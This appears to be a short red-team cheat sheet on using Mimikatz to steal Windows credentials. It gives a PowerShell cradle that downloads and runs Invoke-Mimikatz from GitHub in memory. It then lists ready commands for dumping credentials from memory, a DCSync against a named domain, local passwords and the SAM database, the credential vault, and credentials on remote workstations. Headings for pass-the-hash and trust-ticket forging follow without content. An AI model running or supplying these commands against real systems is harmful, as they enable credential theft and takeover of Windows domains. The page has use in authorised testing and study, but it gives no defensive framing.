Mimikatz
Dump Credentials
# Download and execute in cradle
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')
#Dump creds from memory
Invoke-Mimikatz -DumpCreds
# DCSync Attack
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"'
# Dump local passwords
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
# Dump Credential Vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
# Dump credentials on remote systems
Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02")Dump Domain Credentials
Spawn PowerShell (with compromised NTLM hash)
Forge Inter-domain trust ticket
Over pass the hash
Protection Bypass

Last updated